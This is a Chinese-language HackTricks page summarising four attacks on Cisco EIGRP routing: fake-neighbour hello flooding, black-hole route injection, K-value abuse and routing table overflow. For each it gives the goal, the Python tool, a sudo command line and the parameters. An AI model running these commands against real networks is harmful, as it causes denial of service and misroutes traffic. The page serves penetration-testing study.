EIGRP Attacks

从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

这是 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 中公开的攻击摘要。请查看以获取更多信息。

伪造 EIGRP 邻居攻击

  • 目标:通过向路由器发送大量 EIGRP hello 数据包来使路由器 CPU 过载,可能导致拒绝服务(DoS)攻击。

  • 工具helloflooding.py 脚本。

  • 执行

~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
  • 参数

    • --interface:指定网络接口,例如 eth0

    • --as:定义 EIGRP 自治系统号,例如 1

    • --subnet:设置子网位置,例如 10.10.100.0/24

EIGRP 黑洞攻击

  • 目标:通过注入虚假路由来破坏网络流量流向,导致流量被定向到不存在的目的地的黑洞。

  • 工具routeinject.py 脚本。

  • 执行

~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
  • 参数

    • --interface:指定攻击者系统的接口。

    • --as:定义 EIGRP AS 号。

    • --src:设置攻击者的 IP 地址。

    • --dst:设置目标子网 IP。

    • --prefix:定义目标子网 IP 的掩码。

滥用 K-Values 攻击

  • 目标:通过注入修改后的 K-Values,在 EIGRP 域内创建持续的中断和重新连接,有效地导致 DoS 攻击。

  • 工具relationshipnightmare.py 脚本。

  • 执行

~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
  • 参数

    • --interface:指定网络接口。

    • --as:定义 EIGRP AS 号。

    • --src:设置合法路由器的 IP 地址。

路由表溢出攻击

  • 目标:通过向路由表中注入大量虚假路由来使路由器的 CPU 和 RAM 负载过重。

  • 工具routingtableoverflow.py 脚本。

  • 执行

sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
  • 参数

    • --interface:指定网络接口。

    • --as:定义 EIGRP AS 号。

    • --src:设置攻击者的 IP 地址。

最后更新于